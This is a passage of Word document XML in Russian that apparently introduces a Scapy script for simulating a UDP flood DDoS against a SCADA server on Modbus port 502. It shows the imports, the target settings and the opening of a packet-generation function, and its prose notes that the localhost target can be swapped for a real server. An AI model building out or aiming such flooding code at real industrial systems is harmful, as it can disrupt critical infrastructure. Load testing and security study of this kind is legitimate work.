    <w:p w14:paraId="77A73F05" w14:textId="77777777" w:rsidR="00153D51" w:rsidRDefault="00F91A55" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F91A55">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Для моделирования DDoS-атак используется библиотека Scapy в Python. В данном примере создаются и отправляются множества UDP-пакетов на целевой SCADA-сервер.</w:t>
      </w:r>
      <w:r w:rsidR="00153D51">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F91A55">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Это моделирует атаку на систему и позволяет исследовать ее поведение при нагрузке. </w:t>
      </w:r>
      <w:r w:rsidR="00153D51" w:rsidRPr="00F91A55">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00F91A55">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ython</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E0219" w14:textId="5C31A581" w:rsidR="00153D51" w:rsidRPr="00153D51" w:rsidRDefault="00153D51" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>В примере ниже создаётся и отправляется множество UDP-пакетов на адрес SCADA-сервера.  Но следует помнить, что этот код нужно запускать осторожно и только в тестовой среде (отправка сырых пакетов требует прав администратора). Мы отправляем пакеты локально (например, на 127.0.0.1) для симуляции. В реальном сценарии IP-адрес (target_ip) следует заменить на адрес целевого SCADA-сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A234B0D" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP, UDP, TCP, ICMP, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RandShort</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RandIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>sniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370326FC" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFB75BB" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE034CA" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37560984" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Целевой</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>порт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB7E883" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"127.0.0.1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Целевой</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP SCADA-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5FE871" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>502</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Порт Modbus SCADA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066524D3" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71426A2C" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Функция для генерации случайных пакетов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF00AAE" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>generate_packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
